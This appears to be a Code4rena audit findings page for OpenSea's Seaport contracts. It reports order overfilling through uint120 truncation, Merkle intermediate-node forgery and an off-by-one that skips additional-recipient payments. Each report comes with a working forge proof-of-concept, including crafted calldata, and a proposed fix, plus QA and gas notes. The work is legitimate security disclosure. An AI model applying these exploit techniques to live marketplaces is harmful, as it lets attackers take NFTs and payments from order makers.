Platform: Code4rena
Start Date: 20/05/2022
Pot Size: $1,000,000 USDC
Total HM: 4
Participants: 59
Period: 14 days
Judge: leastwood
Id: 128
League: ETH
Rank: 3/59
Findings: 5
Award: $132,893.58
Selected for report: 1
Solo Findings: 0
22572.5904 USDC - $22,572.59
There's a bug in partial order filling that allows an attacker to overfill any order (fill more than the total size of the order).

This bug happens because the fractions are stored as `uint120`s in `_orderStatus`, but the intermediate computations that scale the fractions to the correct denominator are done in `uint256`. The truncation to `uint120` can be used to "reset" an order to the uninitialized state where nothing has been filled yet.

This leads to losses for the offerer, as they might sell more NFTs than they intended to, or spend more assets on buying NFTs than they submitted with the order. This clearly breaks partial orders for all users and should be considered high severity.
(The attack can also be turned into a griefing/DoS attack where partial fills overflow such that denominator > numerator for the `_orderStatus` and nobody can fill the order anymore.)
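To see why the hand-crafted fractions in the PoC below work, here is a minimal standalone sketch (assumed illustrative code, not Seaport's) of the wrap-around arithmetic. Adding `2**58/2**59` and `2**60/2**61` at a common denominator yields `2**120` in both the numerator and the denominator, and `2**120` truncates to zero in a `uint120`:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Hypothetical sketch, not Seaport code.
contract TruncationSketch {
    function demo() external pure {
        uint256 storedNumerator = 2 ** 58; // fraction recorded by the first partial fill
        uint256 storedDenominator = 2 ** 59;
        uint256 newNumerator = 2 ** 60; // second, hand-crafted partial fill
        uint256 newDenominator = 2 ** 61;

        // Scale both fractions to a common denominator before adding,
        // roughly as the fulfiller does in uint256 arithmetic.
        uint256 scaledFilled = storedNumerator * newDenominator
            + newNumerator * storedDenominator; // 2**119 + 2**119 = 2**120
        uint256 scaledSize = storedDenominator * newDenominator; // 2**120

        // Storing the results as uint120 wraps both to zero:
        // the order looks completely unfilled again.
        assert(uint120(scaledFilled) == 0);
        assert(uint120(scaledSize) == 0);
    }
}
```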
Here's a forge test (gist) that shows the issue: Alice owns 40 ERC1155s and signs an order to sell only 2 of them. In this example, the attacker overfills the order and buys 4 of her ERC1155s. (They could buy all 40 if they wanted to.)
```solidity
contract BugOverfill is BaseOrderTest {
    struct Context {
        ConsiderationInterface consideration;
        uint256 tokenId;
        uint256 tokenAmount;
        uint256 paymentAmount;
        address zone;
        bytes32 zoneHash;
        uint256 salt;
    }

    function testOverfillBug() public resetTokenBalancesBetweenRuns {
        Context memory context = Context(
            consideration,
            1337, /* tokenId */
            2, /* tokenAmount */
            0.1e18, /* paymentAmount */
            address(0), /* zone */
            bytes32(0), /* zoneHash */
            uint256(0) /* salt */
        );
        bytes32 conduitKey = bytes32(0);

        test1155_1.mint(
            alice,
            context.tokenId,
            // alice has a lot more ERC1155 than she's willing to sell
            context.tokenAmount * 10
        );

        _configureOfferItem(
            ItemType.ERC1155,
            context.tokenId,
            context.tokenAmount,
            context.tokenAmount
        ); // set endAmount to 2 * startAmount
        _configureEthConsiderationItem(alice, context.paymentAmount);

        OrderParameters memory orderParameters = OrderParameters(
            address(alice),
            context.zone,
            offerItems,
            considerationItems,
            OrderType.PARTIAL_OPEN,
            block.timestamp,
            block.timestamp + 1000,
            context.zoneHash,
            context.salt,
            conduitKey,
            considerationItems.length
        );
        OrderComponents memory orderComponents = getOrderComponents(
            orderParameters,
            context.consideration.getNonce(alice)
        );
        bytes32 orderHash = context.consideration.getOrderHash(orderComponents);
        bytes memory signature = signOrder(
            context.consideration,
            alicePk,
            orderHash
        );
        delete offerItems;
        delete considerationItems;

        /*************** ATTACK STARTS HERE ***************/
        // @audit Partial Fill 1. These parameters have been hand-crafted to
        // overflow perfectly s.t. we get to the zero state after two partial fills
        AdvancedOrder memory advancedOrder = AdvancedOrder(
            orderParameters,
            // buy 1/2
            2**58, /* numerator */
            2**59, /* denominator */
            signature,
            ""
        );
        context.consideration.fulfillAdvancedOrder{
            value: context.paymentAmount
        }(advancedOrder, new CriteriaResolver[](0), bytes32(0));

        // @audit Partial Fill 2 that resets totalFilled to zero
        advancedOrder = AdvancedOrder(
            orderParameters,
            // buy 1/2
            2**60, /* numerator */
            2**61, /* denominator */
            signature,
            ""
        );
        context.consideration.fulfillAdvancedOrder{
            value: context.paymentAmount
        }(advancedOrder, new CriteriaResolver[](0), bytes32(0));

        (, , uint256 totalFilled, uint256 totalSize) = context
            .consideration
            .getOrderStatus(orderHash);
        // @audit notice that we get back to the "uninitialized" state now
        // and could repeat these two steps ad infinitum
        assertEq(totalFilled, 0);
        assertEq(totalSize, 0);

        // @audit Partial Fill 3: for demonstration purposes we do a full-fill
        // here, even though we already partially filled before
        advancedOrder = AdvancedOrder(
            orderParameters,
            1, /* numerator */
            1, /* denominator */
            signature,
            ""
        );
        context.consideration.fulfillAdvancedOrder{
            value: context.paymentAmount
        }(advancedOrder, new CriteriaResolver[](0), bytes32(0));

        // bug: we bought more than the order's total size (context.tokenAmount)
        assertGt(
            test1155_1.balanceOf(address(this), context.tokenId),
            context.tokenAmount
        );
    }
}
```
One slightly tricky part of this attack is that the fractions must evenly divide the total order amount. The demonstrated attack works for all cases where the total order size is divisible by 2. For other cases, there also exists a sequence of fills that overflows the numerator and allows overfilling.
There are several ways to address this. The hard part is that the code relies on this scaling so it can add up the fractions. It's not enough to simply revert if the scaled values (numerator, denominator) no longer fit into a `uint120`.
An attacker could try a griefing attack where they fill `2**118/2**119` (= 1/2). The next user cannot fill an order like `1/3` anymore, as it can't be expressed with a denominator of `2**119` (3 does not divide `2**119`), and choosing any other denominator would lead to the computation of a scaled denominator larger than `uint120.max`.
If you keep following this approach, you probably need to reduce the final fraction by computing the GCD on-chain, which increases gas costs.
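As a rough illustration of the GCD idea, here is a minimal sketch intended to live inside the fulfiller contract; the function names and the revert reason are assumptions, not Seaport code:

```solidity
// Sketch only: reduce the fraction by its GCD before storing it as uint120.
function _gcd(uint256 a, uint256 b) internal pure returns (uint256) {
    while (b != 0) {
        (a, b) = (b, a % b);
    }
    return a;
}

function _reduceFraction(uint256 numerator, uint256 denominator)
    internal
    pure
    returns (uint120, uint120)
{
    uint256 d = _gcd(numerator, denominator);
    numerator /= d;
    denominator /= d;
    // If the reduced fraction still doesn't fit, reject the fill instead
    // of silently truncating it.
    require(
        numerator <= type(uint120).max && denominator <= type(uint120).max,
        "fraction too large"
    );
    return (uint120(numerator), uint120(denominator));
}
```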
Alternatively, you could let users specify the final fraction, i.e., if the order is currently filled 25% and they want to buy 50%, they specify 75% = `3/4`. Then compute the diff to the current fill, make sure it divides evenly, etc., and set the `_orderStatus` to these parameters. This comes with frontrunning issues.
#0 - HardlyDifficult
2022-06-17T14:46:33Z
Dupe of #77
38226.8801 USDC - $38,226.88
The protocol allows specifying several tokenIds that are acceptable for a single offer. A merkle tree is created out of these tokenIds, and the root is stored as the `identifierOrCriteria` for the item. The fulfiller then submits the actual tokenId and a proof that this tokenId is part of the merkle tree.

There is no real verification that the supplied tokenId is indeed a leaf of the merkle tree. It's possible to submit an intermediate hash of the merkle tree as the tokenId and trade this NFT instead of one of the requested ones.

This leads to losses for the offerer, as they receive a tokenId that they did not specify in the criteria. Usually, this criteria functionality is used to specify tokenIds with certain traits that are highly valuable. The offerer receives a low-value token that does not have these traits.
Alice wants to buy either the NFT with tokenId 1 or tokenId 2. She creates a merkle tree of them; the root is `hash(1||2) = 0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2e0`. She creates an offer for this criteria. An attacker can now acquire the NFT with tokenId `0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2e0` (or, generally, any other intermediate hash value) and fulfill the trade.
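A minimal sketch (assumed standalone code; `_verifyProof` refers to Seaport's criteria verification described above) of why the empty-proof trick passes verification:

```solidity
// Sketch: the attack from the example above.
function demoIntermediateHashCollision() pure {
    // Two-leaf tree from the example: root = hash(1 || 2).
    bytes32 root = keccak256(
        abi.encodePacked(bytes32(uint256(1)), bytes32(uint256(2)))
    );

    // The attacker acquires the NFT whose tokenId equals the root and
    // supplies an empty proof: verification starts with computedHash = leaf,
    // folds in zero proof elements, and compares computedHash against the
    // root, which matches by construction.
    uint256 attackerTokenId = uint256(root);
    assert(bytes32(attackerTokenId) == root); // what _verifyProof ends up checking
}
```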
One might argue that this attack is not feasible because the provided hash is random and tokenIds are generally a counter. However, this is not required by the standard:

"While some ERC-721 smart contracts may find it convenient to start with ID 0 and simply increment by one for each new NFT, callers SHALL NOT assume that ID numbers have any specific pattern to them, and MUST treat the ID as a 'black box'." (EIP-721)

Neither do the standard OpenZeppelin/Solmate implementations use a counter. They only provide internal `_mint(address to, uint256 id)` functions that allow specifying an arbitrary `id`. NFT contracts could let the user choose the token ID to mint, especially contracts that do not have any linked off-chain metadata, like Uniswap LP positions. Therefore, ERC721-compliant token contracts are vulnerable to this attack.
Here's a forge test (gist) that shows the issue for the situation described in the example above.
```solidity
contract BugMerkleTree is BaseOrderTest {
    struct Context {
        ConsiderationInterface consideration;
        bytes32 tokenCriteria;
        uint256 paymentAmount;
        address zone;
        bytes32 zoneHash;
        uint256 salt;
    }

    function hashHashes(bytes32 hash1, bytes32 hash2)
        internal
        returns (bytes32)
    {
        // see MerkleProof.verify
        bytes memory encoding;
        if (hash1 <= hash2) {
            encoding = abi.encodePacked(hash1, hash2);
        } else {
            encoding = abi.encodePacked(hash2, hash1);
        }
        return keccak256(encoding);
    }

    function testMerkleTreeBug() public resetTokenBalancesBetweenRuns {
        // Alice wants to buy NFT ID 1 or 2 for token1. compute merkle tree
        bytes32 leafLeft = bytes32(uint256(1));
        bytes32 leafRight = bytes32(uint256(2));
        bytes32 merkleRoot = hashHashes(leafLeft, leafRight);
        console.logBytes32(merkleRoot);

        Context memory context = Context(
            consideration,
            merkleRoot, /* tokenCriteria */
            1e18, /* paymentAmount */
            address(0), /* zone */
            bytes32(0), /* zoneHash */
            uint256(0) /* salt */
        );
        bytes32 conduitKey = bytes32(0);

        token1.mint(address(alice), context.paymentAmount);
        // @audit assume there's a token where anyone can acquire IDs.
        // smaller IDs are more valuable. we acquire the merkle root ID
        test721_1.mint(address(this), uint256(merkleRoot));

        _configureERC20OfferItem(
            // start, end
            context.paymentAmount,
            context.paymentAmount
        );
        _configureConsiderationItem(
            ItemType.ERC721_WITH_CRITERIA,
            address(test721_1),
            // @audit set merkle root for NFTs we want to accept
            uint256(context.tokenCriteria), /* identifierOrCriteria */
            1,
            1,
            alice
        );
        OrderParameters memory orderParameters = OrderParameters(
            address(alice),
            context.zone,
            offerItems,
            considerationItems,
            OrderType.FULL_OPEN,
            block.timestamp,
            block.timestamp + 1000,
            context.zoneHash,
            context.salt,
            conduitKey,
            considerationItems.length
        );
        OrderComponents memory orderComponents = getOrderComponents(
            orderParameters,
            context.consideration.getNonce(alice)
        );
        bytes32 orderHash = context.consideration.getOrderHash(orderComponents);
        bytes memory signature = signOrder(
            context.consideration,
            alicePk,
            orderHash
        );
        delete offerItems;
        delete considerationItems;

        /*************** ATTACK STARTS HERE ***************/
        AdvancedOrder memory advancedOrder = AdvancedOrder(
            orderParameters,
            1, /* numerator */
            1, /* denominator */
            signature,
            ""
        );

        // resolve the merkle root token ID itself
        CriteriaResolver[] memory cr = new CriteriaResolver[](1);
        bytes32[] memory proof = new bytes32[](0);
        cr[0] = CriteriaResolver(
            0, // uint256 orderIndex;
            Side.CONSIDERATION, // Side side;
            0, // uint256 index; (item)
            uint256(merkleRoot), // uint256 identifier;
            proof // bytes32[] criteriaProof;
        );

        uint256 profit = token1.balanceOf(address(this));
        context.consideration.fulfillAdvancedOrder{
            value: context.paymentAmount
        }(advancedOrder, cr, bytes32(0));
        profit = token1.balanceOf(address(this)) - profit;
        // @audit could fulfill order without owning NFT 1 or 2
        assertEq(profit, context.paymentAmount);
    }
}
```
Usually, this is fixed by using a type byte that indicates whether one is computing the hash of a leaf or of an inner node. An elegant fix here is to simply use hashes of the tokenIds as the leaves, instead of the tokenIds themselves. (Note that this is the natural way to compute merkle trees if the data size is not already the hash size.) Then compute the leaf hash in the contract from the provided tokenId:
```diff
 function _verifyProof(
     uint256 leaf,
     uint256 root,
     bytes32[] memory proof
 ) internal pure {
     bool isValid;
-    assembly {
-        let computedHash := leaf
+    bytes32 computedHash = keccak256(abi.encodePacked(leaf));
     ...
```
There can't be a collision between a leaf hash and an intermediate hash anymore, as the former is the result of hashing 32 bytes while the latter is the result of hashing 64 bytes.

Note that this requires off-chain changes to how the merkle tree is generated. (Leaves must be hashed first.)
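For illustration, a sketch of how the two-leaf example tree would be built under this fix, reusing the PoC's `hashHashes` helper (an assumption, since real trees are built off-chain):

```solidity
// Hash the tokenIds first, then combine: leaves now have 32-byte preimages,
// while inner nodes hash 64 bytes, so the two can never collide.
bytes32 leafLeft = keccak256(abi.encodePacked(uint256(1)));
bytes32 leafRight = keccak256(abi.encodePacked(uint256(2)));
bytes32 merkleRoot = hashHashes(leafLeft, leafRight);
// _verifyProof then recomputes keccak256(abi.encodePacked(tokenId)) as the
// leaf, so supplying an intermediate node as the tokenId no longer matches.
```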
#0 - 0xleastwood
2022-06-22T19:14:48Z
The attack outlined by the warden showcases how an intermediate node of a proof can be used as a leaf, potentially allowing the attacker to resolve the merkle tree to a different `tokenId`. I think in the majority of cases this will not allow users to trade on invalid `tokenId`s; however, considering the `ERC721` specification does not enforce a standard for how NFTs are represented using `tokenId`s, the issue has some legitimacy. Because of this, I believe medium severity to be justified.
#1 - liveactionllama
2022-08-30T15:16:45Z
Per @0age resolved via: https://github.com/ProjectOpenSea/seaport/pull/316
63711.4668 USDC - $63,711.47
The `_assertConsiderationLengthIsNotLessThanOriginalConsiderationLength` call is off-by-one because of the `parameters.additionalRecipients.length + 1` argument:
```solidity
// requires parameters.additionalRecipients.length + 1 >= parameters.totalOriginalAdditionalRecipients
_assertConsiderationLengthIsNotLessThanOriginalConsiderationLength(
    parameters.additionalRecipients.length + 1,
    parameters.totalOriginalAdditionalRecipients
);
```
The code is essentially a `require` statement checking `parameters.additionalRecipients.length + 1 >= parameters.totalOriginalAdditionalRecipients`.

If `parameters.totalOriginalAdditionalRecipients == 1`, then `parameters.additionalRecipients = []` can be an empty array and the check still passes, as `0 + 1 >= 1`.

This allows not paying for a consideration item that the offerer specified (their `totalOriginalAdditionalRecipients` is one, but we didn't provide any additional recipient, and the check passed), stealing from the offerer.
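To make the off-by-one concrete, here is a self-contained sketch; the helper name matches the report, but its body and the revert reason are simplified assumptions:

```solidity
// Simplified stand-in for the effective length check.
function _assertConsiderationLengthIsNotLessThanOriginalConsiderationLength(
    uint256 suppliedConsiderationItemTotal,
    uint256 originalConsiderationItemTotal
) pure {
    // Reverts only if fewer items were supplied than originally signed for.
    require(
        suppliedConsiderationItemTotal >= originalConsiderationItemTotal,
        "MissingOriginalConsiderationItems"
    );
}

// fulfillBasicOrder passes additionalRecipients.length + 1 as the supplied
// total. With additionalRecipients.length == 0 and
// totalOriginalAdditionalRecipients == 1, the check is 0 + 1 >= 1 and
// passes, even though one originally signed recipient is missing.
```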
Due to technicalities of the current exploit (explained below), it's only possible to steal tokens up to the max calldata size. However, this is still significant for highly valuable tokens like 8-decimal WBTC. It could also be an ERC20 token that can be redeemed for something valuable, etc. In general, the offerer specifies an ERC20 token and payments to additional recipients that are required for the trade, but an attacker can avoid these payments.
The exploit is quite involved, because when we remove an item from `additionalRecipients`, the order hash changes and the signature verification will fail.

However, note that the loop still iterates (from `0` to `totalOriginalAdditionalRecipients`) and hashes the memory area at `additionalRecipients[0]` using low-level code, which is now an out-of-bounds read. It is indeed possible to place the original additional-recipient item at this location (while setting the array length to zero) using a non-standard calldata encoding, and to compute the correct order hash over it.

The next issue is that the non-standard calldata encoding now fails in `_assertValidBasicOrderParameterOffsets`, but we can fix this by pointing the `signature` offset to the expected address, which is `additionalRecipients[0]`.

The signature verification would now fail, as it uses the `additionalRecipients[0]` bytes as the signature; however, we can fix this by pre-validating the order through a `consideration.validate(ordersToValidate)` call. In the exploit transaction, the signature bytes no longer matter, as the signature check is now skipped.
Here's a forge test (gist) that shows the issue:
Alice wants to sell her NFT for `considerationAmount` of a consideration token and specifies an `additionalRecipient` that should receive an additional `addAmount` of this token (for example, a royalty, a creator fee, or just splitting the funds between two of her accounts). The attacker can buy Alice's item by paying only the `considerationAmount` but not the additional `addAmount`.
```solidity
contract BugAdditionalRecipients is BaseOrderTest {
    BasicOrderParameters basicOrderParameters;

    struct Context {
        ConsiderationInterface consideration;
        uint256 tokenId;
        uint256 considerationAmount;
        uint256 addAmount;
        address zone;
        bytes32 zoneHash;
        uint256 salt;
    }

    function _configureBasicOrderParametersErc20ToErc721(Context memory context)
        internal
        returns (OrderParameters memory orderParameters)
    {
        // offer 721 and consider ERC20 with additional royalty payments to me
        basicOrderParameters.offerer = payable(alice);
        basicOrderParameters.offerToken = address(test721_1);
        basicOrderParameters.offerIdentifier = context.tokenId;
        basicOrderParameters.offerAmount = 1;
        basicOrderParameters.considerationToken = address(token1);
        basicOrderParameters.considerationIdentifier = 0;
        basicOrderParameters.considerationAmount = context.considerationAmount;
        basicOrderParameters.basicOrderType = BasicOrderType
            .ERC20_TO_ERC721_FULL_OPEN;
        basicOrderParameters.zone = context.zone;
        basicOrderParameters.startTime = block.timestamp;
        basicOrderParameters.endTime = block.timestamp + 100;
        basicOrderParameters.zoneHash = context.zoneHash;
        basicOrderParameters.salt = context.salt;
        basicOrderParameters.offererConduitKey = bytes32(0);
        basicOrderParameters.fulfillerConduitKey = bytes32(0);
        basicOrderParameters.totalOriginalAdditionalRecipients = 1;
        basicOrderParameters.additionalRecipients.push(
            AdditionalRecipient(context.addAmount, bob)
        );

        // reproduce these same items in a different struct just to sign
        ...
        basicOrderParameters.signature = signature;
    }

    function testBug() public resetTokenBalancesBetweenRuns {
        Context memory context = Context(
            consideration,
            42, /* tokenId */
            0xDEAD, /* considerationAmount */
            1e7, /* additionalAmount */
            address(0), /* zone */
            bytes32(0), /* zoneHash */
            uint256(0) /* salt */
        );
        test721_1.mint(alice, context.tokenId);
        OrderParameters memory orderParameters = _configureBasicOrderParametersErc20ToErc721(
            context
        );

        /*************** ATTACK STARTS HERE ***************/
        // pre-validate the order hash with the actual signature
        Order[] memory ordersToValidate = new Order[](1);
        ordersToValidate[0] = Order(
            orderParameters,
            basicOrderParameters.signature
        );
        bool validated = context.consideration.validate(ordersToValidate);
        assertTrue(validated);

        uint256 fulfillerPaid = token1.balanceOf(address(this));
        // context.consideration.fulfillBasicOrder(basicOrderParameters);
        // this would be the normal call where we have to pay
        // `considerationAmount` + `additionalAmount`

        // build our custom calldata, starting with the legitimate calldata
        bytes memory callData = abi.encodeWithSelector(
            ConsiderationInterface.fulfillBasicOrder.selector,
            basicOrderParameters
        );

        // the code iterates up to totalOriginalAdditionalRecipients to compute
        // the orderHash, regardless of additionalRecipients.length
        // see https://github.com/code-423n4/2022-05-opensea-seaport/blob/4140473b1f85d0df602548ad260b1739ddd734a5/contracts/lib/BasicOrderFulfiller.sol#L506
        // but it only creates transfers for the actual additionalRecipients
        // as we don't want to pay for the additionalRecipients consideration
        // items, we set its length to zero
        // the orderHash is still computed correctly as it iterates up to the
        // totalOriginalAdditionalRecipients and does an out-of-bounds read
        // 0x264 cdPtr (where the offset to the packed var is stored); headPtr = 0x240
        callData[BasicOrder_additionalRecipients_length_cdPtr + 31] = 0; // set array length to zero

        // however, to pass the `_assertValidBasicOrderParameterOffsets` calldata
        // offset checks, we now need `signature` to point to `additionalRecipients[0]`
        // see https://github.com/code-423n4/2022-05-opensea-seaport/blob/4140473b1f85d0df602548ad260b1739ddd734a5/contracts/lib/Assertions.sol#L105
        callData[BasicOrder_signature_cdPtr + 30] = 0x02; // set it to the value it expects 0x260 = 0x260 + 0 * addRecpSize
        callData[BasicOrder_signature_cdPtr + 31] = 0x60; // set it to the value it expects 0x260 = 0x260 + 0 * addRecpSize

        // pad it by context.addAmount so we don't crash when solidity
        // deserializes the signature, as it reads the length from
        // additionalRecipients[0].amount
        // see https://github.com/code-423n4/2022-05-opensea-seaport/blob/4140473b1f85d0df602548ad260b1739ddd734a5/contracts/lib/BasicOrderFulfiller.sol#L922
        // we don't care about the actual values for the signature as the order
        // was pre-validated and the code short-circuits, so just increase the length
        uint256 addAmount = callData.length + context.addAmount;
        // callData.length = addAmount. use assembly as `length` is read-only
        assembly {
            mstore(callData, addAmount)
        }

        (bool success, bytes memory returnData) = address(context.consideration)
            .call{ value: 0 }(callData);
        if (!success) {
            if (returnData.length == 0) revert();
            assembly {
                revert(add(32, returnData), mload(returnData))
            }
        }

        fulfillerPaid -= token1.balanceOf(address(this));
        // bug: we only paid for the considerationItem but not for `context.additionalAmount`
        assertEq(fulfillerPaid, context.considerationAmount);
    }
}
```
Fix the call:

```diff
 _assertConsiderationLengthIsNotLessThanOriginalConsiderationLength(
-    parameters.additionalRecipients.length + 1,
+    parameters.additionalRecipients.length,
     parameters.totalOriginalAdditionalRecipients
 );
```
#0 - HardlyDifficult
2022-06-19T16:42:12Z
Dupe of #129
Selected for report: Spearbit
Also found by: 0xsanson, Chom, IllIllI, OriDabush, Saw-mon_and_Natalie, broccoli, cccz, cmichel, csanuragjain, foobar, hack3r-0m, hickuphh3, hubble, hyh, ilan, kebabsec, mayo, oyc_109, peritoflores, rfa, scaraven, sces60107, shung, sorrynotsorry, tintin, twojoy, zkhorse, zzzitron
7524.761 USDC - $7,524.76
- Should `FractionData`'s `numerator` and `denominator` be `uint120`, as in other places?
- The `_checkMatchingConsideration` function does not revert on `false`; instead, the result is assigned to the `potentialCandidate.invalidFulfillment` field. But this field can be overwritten with a `true` value by aggregating another item that matches in the next loop iteration. This allows trading the offerer's items for useless items by falsely aggregating high-value consideration items: their amount is set to zero, and one does not have to transfer these consideration items. The bug is not present in the YUL version, where `_checkMatchingConsideration` always reverts on `false`.
- `ReferenceOrderFulfiller.sol`: Should be "Create Received Item from …"
- `_cancel` and `_validate` always return `true`. This is misleading, as returning a `boolean` indicates that these functions can also return `false` on a failed cancellation/validation (instead of reverting). The return value is useless here, as it's always set to `true`. Consider removing the return value to make the semantics of these functions clearer and to save gas.
- `_assertValidSignature` only verifies that `v == 27 || v == 28` in the `signature.length == 65` case, but not in the `signature.length == 64` case. This is inconsistent behavior. For reference, the OZ implementation checks `v` in both cases. In practice, this does not seem to be an issue, as `ecrecover` fails on an invalid `v` anyway (recovering the zero address). However, Seaport's `BadSignature` error is only thrown for an invalid `v` in one of the two cases. Consider adding the same check to the `signature.length == 64` case.
- The `_performERC721Transfer` function performs a `transferFrom` call instead of a `safeTransferFrom` call. It could be that `to` is a receiver contract which does not accept ERC721 tokens, signaled by not implementing `onERC721Received` as demanded by the spec. The tokens can get stuck in these contracts. This is generally not a problem if `msg.sender` is the `to` receiver or when the offerer chose their offer items, but it can happen as arbitrary ERC721 transfers can be added as additional consideration items.

#0 - HardlyDifficult
2022-06-20T20:40:47Z
Selected for report: Dravee
Also found by: 0x1f8b, 0x29A, 0xalpharush, Chom, Czar102, Hawkeye, IllIllI, MaratCerby, MiloTruck, NoamYakov, OriDabush, RoiEvenHaim, Spearbit, Tadashi, TerrierLover, TomJ, asutorufos, cccz, cmichel, csanuragjain, defsec, delfin454000, djxploit, ellahi, foobar, gzeon, hake, hickuphh3, ignacio, ilan, joestakey, kaden, mayo, ming, oyc_109, peritoflores, rfa, sach1r0, sashik_eth, shung, sirhashalot, twojoy, zer0dot, zkhorse
857.8758 USDC - $857.88
The `data.length != 0 && data.length >= 32` check has a redundancy: since `data.length >= 32` is required and implies `data.length != 0`, one can simplify this expression to `data.length >= 32`.

The YUL version of the code checks `(abi.decode(data, uint256) == 1 && data.length > 31) || data.length == 0`, which is already correctly optimized.
The `ConduitController` computes the `_CONDUIT_RUNTIME_CODE_HASH` variable by deploying a `Conduit` contract and reading its `.codehash`. However, this variable is only used to check whether a conduit has been deployed, via `conduit.codehash == _CONDUIT_RUNTIME_CODE_HASH`. The `conduit` variable is always a `create2` address, and by the way `create2` addresses work, the check can also be implemented as `conduit.code.length != 0`. (The creation code is already part of the `create2` address, and this creation code always leads to the same runtime code for `Conduit`s.)

This saves deploying a `Conduit` contract in the constructor, and the new check should also be more gas-efficient.
MerkleProof.verify

The `MerkleProof.verify` function can be improved by using the `xor` trick instead of a `switch` to order the hashes, plus some other improvements (Credit):
```diff
 function _verifyProof(
     uint256 leaf,
     uint256 root,
     bytes32[] memory proof
 ) internal pure {
     bool isValid;
     assembly {
         // Start the hash off as just the starting leaf.
         let computedHash := leaf

         // Get memory start location of the first element in proof array.
         let data := add(proof, OneWord)

         // Iterate over proof elements to compute root hash.
-        for {
-            let end := add(data, mul(mload(proof), OneWord))
-        } lt(data, end) {
-            data := add(data, OneWord)
-        } {
-            // Get the proof element.
-            let loadedData := mload(data)
-
-            // Sort and store proof element and hash.
-            switch gt(computedHash, loadedData)
-            case 0 {
-                mstore(0, computedHash) // Place existing hash first.
-                mstore(0x20, loadedData) // Place new hash next.
-            }
-            default {
-                mstore(0, loadedData) // Place new hash first.
-                mstore(0x20, computedHash) // Place existing hash next.
-            }
-
-            // Derive the updated hash.
-            computedHash := keccak256(0, TwoWords)
-        }
+        for {
+            // Left shift by 5 is equivalent to multiplying by 0x20.
+            let end := add(data, shl(5, mload(proof)))
+        } lt(data, end) {
+            data := add(data, OneWord)
+        } {
+            let loadedData := mload(data)
+            // Slot of `computedHash` in scratch space.
+            // If the condition is true: 0x20, otherwise: 0x00.
+            let scratch := shl(5, gt(computedHash, loadedData))
+
+            // Store elements to hash contiguously in scratch space.
+            // Scratch space is 64 bytes (0x00 - 0x3f) and both elements are 32 bytes.
+            mstore(scratch, computedHash)
+            mstore(xor(scratch, 0x20), loadedData)
+            computedHash := keccak256(0, TwoWords)
+        }

         // Compare the final hash to the supplied root.
         isValid := eq(computedHash, root)
     }

     // Revert if computed hash does not equal supplied root.
     if (!isValid) {
         revert InvalidProof();
     }
 }
```
#0 - HardlyDifficult
2022-06-26T15:34:19Z
Gas: Unnecessary ERC20 transfer data length check
This impacts the reference implementation, which is not a target for optimizations; as the warden notes, the optimized Yul version already seems to do the right thing here.
The other 2 recommendations may be worthwhile optimizations to include.